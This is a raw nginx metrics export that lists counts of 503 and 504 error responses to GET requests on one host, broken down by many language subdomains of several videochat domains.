nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.date"} 2324 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.show"} 530 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.tv.br"} 3607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.world"} 2149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.cafe"} 1465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.date"} 649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.show"} 1354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.tv.br"} 3700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.world"} 895 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.cafe"} 1003 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.date"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.mx"} 6979 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.show"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.tv.br"} 3509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.world"} 562 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.cafe"} 2239 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.date"} 746 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.mx"} 731 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.show"} 1229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.tv.br"} 4054 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.world"} 540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.cafe"} 1337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.date"} 1368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.mx"} 15642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.show"} 847 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.tv.br"} 4579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.world"} 1147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vmi460104.contaboserver.net"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.cafe"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.cafe"} 785 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.date"} 213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.mx"} 7055 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.show"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.tv.br"} 3635 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.world"} 566 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.cafe"} 1586 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.date"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.show"} 425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.tv.br"} 3886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.world"} 708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.cafe"} 1492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.date"} 1250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.mx"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.show"} 467 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.tv.br"} 3825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.world"} 802 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.cafe"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.date"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.cafe"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.date"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.cafe"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.cafe"} 187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.date"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.tv.br"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.cafe"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.date"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.cafe"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.date"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.tv.br"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.cafe"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.date"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.cafe"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.date"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.cafe"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.date"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.cafe"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.cafe"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.date"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.tv.br"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.cafe"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.date"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.tv.br"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.cafe"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.date"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.cafe"} 182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.cafe"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.cafe"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.cafe"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.cafe"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.tv.br"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.date"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.cafe"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.date"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.cafe"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.date"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.tv.br"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.cafe"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.date"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.date"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.cafe"} 156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.date"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.cafe"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.cafe"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.date"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.cafe"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.date"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.tv.br"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.cafe"} 125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.date"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.cafe"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.tv.br"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.cafe"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.cafe"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.date"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.cafe"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.cafe"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.tv.br"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.cafe"} 125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.date"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.mx"} 19 